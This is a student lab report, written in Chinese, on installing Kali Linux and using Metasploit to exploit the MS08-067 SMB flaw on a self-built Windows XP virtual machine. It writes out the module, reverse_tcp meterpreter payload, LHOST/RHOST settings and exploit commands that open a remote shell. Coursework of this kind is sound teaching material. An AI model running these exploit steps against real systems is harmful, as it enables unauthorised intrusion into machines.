软件安全实验三——实验报告

实验要求

使用渗透性测试工具 Metasploit 进行漏洞测试。实验内容如下。
1)安装并配置Kali(https://www.kali.org)。
2)从Kali 操作系统的终端初始化和启动Metasploit 工具。
3)使用 Metasploit 挖掘 MS08-067 等漏洞。

实验过程

一 安装并配置Kali
  1. Get Kali | Kali Linux中下载kali-linux-2024.3-vmware-amd64.7z并解压。

    4677d3c8b57a97876e5a46a5658eb514

  2. 在VMware WorkStation中,点击“打开虚拟机”,选择刚刚下载的镜像。

    9ae5bd532a4d8d5f6e02cda74156dc29

  3. 启动虚拟机,输入账户密码(默认均为kali),进入桌面。

    image-20241210160430438

    image-20241210160508753

二 初始化和启动Metasploit 工具
  1. 通过以下命令设置和初始化 Metasploit 的数据库

    1
    2
    3
    4
    service --status-all
    service postgresql start
    service postgresql status
    msfdb init

    image-20241210161524862image-20241210161617700

    image-20241210161717136

  2. 然后启动 Metasploit 工具并检查db状态。

    1
    2
    msfconsole
    msf6 > db_status

    image-20241210161948109

三 挖掘 MS08-067 等漏洞
  1. 准备靶机。

    在VMware WorkStation中创建一个虚拟机,使用windows xp home edition镜像,按提示完成安装。

    image-20241210165636348

    然后关闭系统防火墙。

    image-20241210165825797

    打开命令行,输入ipconfig查看ip为:192.168.65.129。

    image-20241210170052464

    查看kali机的ip为192.168.65.130,并测试能否ping通windows机:

    image-20241218160403878

    1. 渗透攻击。

      先输入msfconsole进入msf6终端:

      image-20241218155640851

      然后输入search ms08_067查看该漏洞:

      image-20241218155756403

      下面是要攻击的target:

      image-20241218161045220

      输入use exploit/windows/smb/ms08_067_netapi加载该模块,然后输入show payloads查看可用的攻击载荷。

      image-20241218155852123

      下面这个是需要的payload:

      image-20241218160859967

      然后:

      1
      2
      3
      4
      5
      set LHOST 192.168.65.130 # Kali虚拟机ip
      set RHOST 192.168.65.129 # windows xp靶机ip
      set payload windows/meterpreter/reverse_tcp
      set target 34
      show options

      image-20241218161227701

      输入exploit进行攻击:

      image-20241218161332072

      在输入shell进入靶机命令行:

      image-20241218161439683

      测试确实是windows靶机的ip:

      image-20241218161515287

      成功!